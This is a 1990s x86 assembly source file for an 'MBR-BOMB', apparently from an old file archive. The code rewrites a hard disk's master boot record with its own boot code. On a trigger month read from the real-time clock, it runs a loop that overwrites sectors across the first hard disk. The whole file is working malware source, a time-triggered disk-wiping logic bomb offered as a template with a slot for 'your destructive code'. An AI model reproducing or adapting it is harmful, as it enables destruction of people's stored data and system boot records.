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Text File  |  1994-02-03  |  4KB  |  110 lines

  1. MBR:
  2. ;**************************************
  3. ;    Start of MBR-BOMB writing
  4. ;**************************************
  5. mov ax,9f80h                ;very high memory                   
  6. mov es,ax                   ;good for buffer                
  7. mov ax,0201h                ;read the original         
  8. mov cx,0001h                ;MBR of the disk           
  9. mov dx,0080h                ;              
  10. xor bx,bx                   ;to buffer 9f80:0000h                       
  11. int 13h                     ;           
  12. push cs                     ; 
  13. pop ds                      ; 
  14. mov ax,9f80h                ;add my MBR-BOMB                                    
  15. mov es,ax                   ;to real MBR in my       
  16. mov si,offset fat           ;buffer              
  17. xor di,di                   ;                   
  18. mov cx,105                  ;ds:[fat]=>9f80:0000h
  19. repe movsb                  ;total 105bytes                   
  20. mov ax,9f80h                ;   
  21. mov es,ax                   ;   
  22. xor bx,bx                   ;replace the original    
  23. mov ax,0301h                ;MBR in the disk by the
  24. xor ch,ch                   ;new MBR-BOMB.  
  25. mov dx,0080h                ;
  26. mov cl,1                    ;WARNING! VSAFE/MSAVE 
  27. mov bx,0                    ;NOTIFY THIS ACTION 
  28. int 13h                     ; 
  29. ret                         ;
  30. ;---------------------------------------------------
  31. ;*********************      
  32. ; Start of MBR code          
  33. ;*********************        
  34. fat:                              ;       
  35. cli                               ;#       
  36. xor     ax,ax                     ;#     
  37. mov     ss,ax                     ;#       
  38. mov     sp,7C00h                  ;#        
  39. mov     si,sp                     ;#        
  40. push    ax                        ;#    
  41. pop     es                        ;# 
  42. push    ax                        ;# 
  43. pop     ds                        ;#     
  44. sti                               ;#
  45.                                   ;#   
  46. pushf                             ;#   
  47. push ax                           ;# 
  48. push cx                           ;# = This code be in the
  49. push dx                           ;#   original MBR
  50. push ds                           ;#   (NOT MODIFY)
  51. push es                           ;#   
  52. MOV AH,04H                        ; Read real tyme                       
  53. INT 1AH                           ; Clock          
  54. CMP DH,cs:byte ptr action_mes     ; is Month?     
  55. JE CAGO                           ; yes! SNIF SNIF HD. 
  56. lit:
  57. pop es
  58. pop ds
  59. pop dx  
  60. pop cx
  61. pop ax
  62. popf
  63. jmp booti
  64. CAGO:
  65. ;++++++++++++++++++++++++++++++++++++++++++++++++++++
  66. ; START OF YOUR DESTRUCTIVE CODE (or not destructive)
  67. ;++++++++++++++++++++++++++++++++++++++++++++++++++++
  69. rip_hd:                            
  70.                               ;@                                  
  71.                 xor dx, dx    ;@                
  72. rip_hd1:                      ;@
  73.         mov cx, 2     ;@                 
  74.         mov ax, 311h  ;@    
  75.         mov dl, 80h   ;@             
  76.         mov bx, 5000h ;@       
  77.         mov es, bx    ;@ 
  78.         int 13h       ;@          
  79.         jae rip_hd2   ;@         
  80.         xor ah, ah    ;@       
  81.         int 13h       ;@       
  82.         rip_hd2:      ;@        
  83.         inc dh        ;@        
  84.         cmp dh, 4     ;@                
  85.         jb rip_hd1    ;@ 
  86.         inc ch        ;@        
  87.         jmp rip_hd            
  89. ;+++++++++++++++++++++++++++++++++++++++++++
  91. ;+++++++++++++++++++++++++++++++++++++++++++
  92. booti:
  93. xor ax,ax     ;#         
  94. mov es,ax     ;#       
  95. mov bx,7c00h  ;#             
  96. mov ah,02     ;#          
  97. mov al,1      ;#         
  98. mov cl,1      ;# #= This code be       
  99. mov ch,0      ;#    in the original        
  100. mov dh,1      ;#    MBR    
  101. mov dl,80h    ;#    (NOT MODIFY)   
  102.               ;#             
  103. int 13h       ;#                
  104.               ;#          
  105. db 0eah,00,7ch,00,00 ;#    
  106. ;*******************
  107. ; END OF MBR CODE
  108. ;*******************